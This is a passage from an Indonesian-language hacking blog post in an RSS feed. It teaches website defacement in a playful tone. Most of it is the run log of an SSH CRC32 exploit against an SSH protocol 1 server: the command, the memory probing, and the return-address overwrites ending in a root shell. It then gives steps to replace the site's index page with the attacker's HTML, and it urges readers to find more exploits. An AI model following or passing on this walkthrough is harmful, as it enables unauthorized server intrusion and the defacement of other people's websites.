untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2
cyber underground…hehehehe &quot;yang kreatif donk..!!”&lt;/p&gt;
&lt;p&gt;Okeh sekrang kita ke UNIX yah…di unix sendiri yang perlu dilakukan
untuk men-deface situs adalah memperoleh fasilitas root dari server
tsb. Cara memperoleh fasilitas root tentu saja melalui exploit
(mengenai masalah exploit bisa kalian lihat di bagian &quot;Hacking Shell”).
Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas
root dari exploit &quot;SSH CRC32 Exploit”, exploit ini ditujukan pada SSH
server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured
to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja
seperti ini :&lt;/p&gt;
&lt;p&gt;[root@juventini]# ./x10 -t1 192.168.1.120&lt;/p&gt;
&lt;p&gt;password:&lt;/p&gt;
&lt;p&gt;Target: Small – SSH-1.5-1.2.26&lt;/p&gt;
&lt;p&gt;Attacking: 192.168.1.120:22&lt;br&gt;
Testing if remote sshd is vulnerable # ATTACH NOWYES #&lt;br&gt;
Finding h – buf distance (estimate)&lt;br&gt;
(1 ) testing 0×00000004 # SEGV #&lt;br&gt;
(2 ) testing 0×0000c804 # FOUND #&lt;br&gt;
Found buffer, determining exact diff&lt;br&gt;
Finding h – buf distance using the teso method&lt;br&gt;
(3 ) binary-search: h: 0×083fb7fc, slider: 0×00008000 # SEGV #&lt;br&gt;
(4 ) binary-search: h: 0×083f77fc, slider: 0×00004000 # SURVIVED #&lt;br&gt;
(5 ) binary-search: h: 0×083f97fc, slider: 0×00002000 # SURVIVED #&lt;br&gt;
(6 ) binary-search: h: 0×083fa7fc, slider: 0×00001000 # SEGV #&lt;br&gt;
(7 ) binary-search: h: 0×083f9ffc, slider: 0×00000800 # SEGV #&lt;br&gt;
(8 ) binary-search: h: 0×083f9bfc, slider: 0×00000400 # SEGV #&lt;br&gt;
(9 ) binary-search: h: 0×083f99fc, slider: 0×00000200 # SURVIVED #&lt;br&gt;
(10) binary-search: h: 0×083f9afc, slider: 0×00000100 # SEGV #&lt;br&gt;
(11) binary-search: h: 0×083f9a7c, slider: 0×00000080 # SEGV #&lt;br&gt;
(12) binary-search: h: 0×083f9a3c, slider: 0×00000040 # SEGV #&lt;br&gt;
(13) binary-search: h: 0×083f9a1c, slider: 0×00000020 # SEGV #&lt;br&gt;
(14) binary-search: h: 0×083f9a0c, slider: 0×00000010 # SURVIVED #&lt;br&gt;
(15) binary-search: h: 0×083f9a14, slider: 0×00000008 # SURVIVED #&lt;br&gt;
Bin search done, testing result&lt;br&gt;
Finding exact h – buf distance&lt;br&gt;
(16) trying: 0×083f9a14 # SURVIVED #&lt;br&gt;
Exact match found at: 0×000065ec&lt;br&gt;
Looking for exact buffer address&lt;br&gt;
Finding exact buffer address&lt;br&gt;
(17) Trying: 0×080865ec # SURVIVED #&lt;br&gt;
Finding distance till stack buffer&lt;br&gt;
(18) Trying: 0xb7f81400 # SEGV #&lt;br&gt;
(19) Trying: 0xb7f81054 # SEGV #&lt;br&gt;
(20) Trying: 0xb7f80ca8 # SEGV #&lt;br&gt;
(21) Trying: 0xb7f808fc # SEGV #&lt;br&gt;
(22) Trying: 0xb7f80550 # SEGV #&lt;br&gt;
(23) Trying: 0xb7f801a4 # SEGV #&lt;br&gt;
(24) Trying: 0xb7f7fdf8 # SEGV #&lt;br&gt;
(25) Trying: 0xb7f7fa4c # SEGV #&lt;br&gt;
(26) Trying: 0xb7f7f6a0 # SEGV #&lt;br&gt;
(27) Trying: 0xb7f7f2f4 # SEGV #&lt;br&gt;
(28) Trying: 0xb7f7ef48 # SEGV #&lt;br&gt;
(29) Trying: 0xb7f7eb9c # SEGV #&lt;br&gt;
(30) Trying: 0xb7f7e7f0 # SEGV #&lt;br&gt;
(31) Trying: 0xb7f7e444 # SEGV #&lt;br&gt;
(32) Trying: 0xb7f7e098 # SURVIVED # verifying&lt;br&gt;
(33) Trying: 0xb7f7e098 # SEGV # OK&lt;br&gt;
Finding exact h – stack_buf distance&lt;br&gt;
(34) trying: 0xb7f7de98 slider: 0×0200# SURVIVED #&lt;br&gt;
(35) trying: 0xb7f7dd98 slider: 0×0100# SURVIVED #&lt;br&gt;
(36) trying: 0xb7f7dd18 slider: 0×0080# SEGV #&lt;br&gt;
(37) trying: 0xb7f7dd58 slider: 0×0040# SEGV #&lt;br&gt;
(38) trying: 0xb7f7dd78 slider: 0×0020# SURVIVED #&lt;br&gt;
(39) trying: 0xb7f7dd68 slider: 0×0010# SEGV #&lt;br&gt;
(40) trying: 0xb7f7dd70 slider: 0×0008# SEGV #&lt;br&gt;
(41) trying: 0xb7f7dd74 slider: 0×0004# SURVIVED #&lt;br&gt;
(42) trying: 0xb7f7dd72 slider: 0×0002# SEGV #&lt;br&gt;
Final stack_dist: 0xb7f7dd74&lt;br&gt;
EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcfa&lt;/p&gt;
&lt;p&gt;ATTACH NOW&lt;br&gt;
Changing MSW of return address to: 0×0808&lt;br&gt;
Crash, finding next return address&lt;br&gt;
Changing MSW of return address to: 0×0809&lt;br&gt;
Crash, finding next return address&lt;br&gt;
Changing MSW of return address to: 0×080a&lt;br&gt;
Crash, finding next return address&lt;br&gt;
EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcf6&lt;/p&gt;
&lt;p&gt;ATTACH NOW&lt;br&gt;
Changing MSW of return address to: 0×0808&lt;br&gt;
Crash, finding next return address&lt;br&gt;
Changing MSW of return address to: 0×0809&lt;br&gt;
Crash, finding next return address&lt;br&gt;
Changing MSW of return address to: 0×080a&lt;br&gt;
Crash, finding next return address&lt;br&gt;
EX: buf: 0×080835ec h: 0×0807d000 ret-dist: 0xb7f7dcfc&lt;/p&gt;
&lt;p&gt;ATTACH NOW&lt;br&gt;
Changing MSW of return address to: 0×0808&lt;br&gt;
Crash, finding next return address&lt;br&gt;
Changing MSW of return address to: 0×0809&lt;br&gt;
No Crash, might have worked&lt;br&gt;
Reply from remote: CHRIS CHRIS&lt;/p&gt;
&lt;p&gt;***** YOU ARE IN *****&lt;/p&gt;
&lt;p&gt;localhost.localdomain&lt;/p&gt;
&lt;p&gt;Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000&lt;br&gt;
i686&lt;br&gt;
unknown&lt;/p&gt;
&lt;p&gt;uid=0(root) gid=0(root)&lt;br&gt;
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)&lt;/p&gt;
&lt;p&gt;…..HOREEEEE…dapat root heheehehhe, nah sekarang loe udah mendapatkan
fasilitas root, okeh sekarang kita mulai men-deface situs yang tedapat
pada server tsb. Pertama-tama perlu kalian ketahui bahwa biasanya
halaman index pada server UNIX ditempatkan pada direktori tertentu,
yaitu : home/html atau home/html/httpd atau bisa juga di direktori
var/html atau var/html/httpd&lt;br&gt;
naH..tunggu apa lagi coba deh loe liat-liat isi direktori itu…untuk
meyakinkannya loe buka situs tsb pada browser dan lihatlah apa nama
dari file halaman index situs itu..hmmm biasanya sich index.html atau
index.htm Udah dapat indexnya? kalo udah sekarang loe bisa echo
deh…gampang kan??? heheheh..cuman kalo gue rada malas sich make echo
mending bikin halaman baru…;)), gini caranya :&lt;br&gt;
&lt;/p&gt;
&lt;ol&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;&lt;span&gt;&lt;span&gt;
&lt;li&gt;ganti dulu nama indexnyamv index.htm oldindex.htm&lt;/li&gt;
&lt;li&gt;sekarang buka editor dari shell, bisa make vi atau pico : vi index.htm&lt;/li&gt;
&lt;li&gt;masukan HTML yang kalian buat di vi ataupun pico tadi&lt;/li&gt;
&lt;li&gt;buka browser kalian….heheeheh..udah ganti kan sekrang halamannya..:))) SiiiPPPP..!!&lt;/li&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/ol&gt;
&lt;span style=&quot;font-size: 85%;&quot;&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;Gitu aja kok
caranya…mudah aja kan..?? hehehhe…intinya memang cuman bagaimana
mendapatkan fasilitas root pada server, dan seperti yang telah gue
bilang tadi bahwa setiap server memiliki karakteristik yang
berbeda-beda sesuai dengan OS nya masing2. Sehingga diperlukan exploit
yang berbeda apabila kita ingin mencoba menembus server yang memiliki
OS yang berbeda pula…so many exploit out thare…just get iT..!!
hehehheudah dulu yah…BUBAYYYYYY!!!!!!!!!!!!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;</content:encoded>
			<link>https://habul.ucoz.com/blog/deface_website_via_url_windows_version/2010-01-17-1</link>
			<dc:creator>habul</dc:creator>
			<guid>https://habul.ucoz.com/blog/deface_website_via_url_windows_version/2010-01-17-1</guid>
			<pubDate>Sun, 17 Jan 2010 06:15:08 GMT</pubDate>
		</item>
	</channel>
</rss>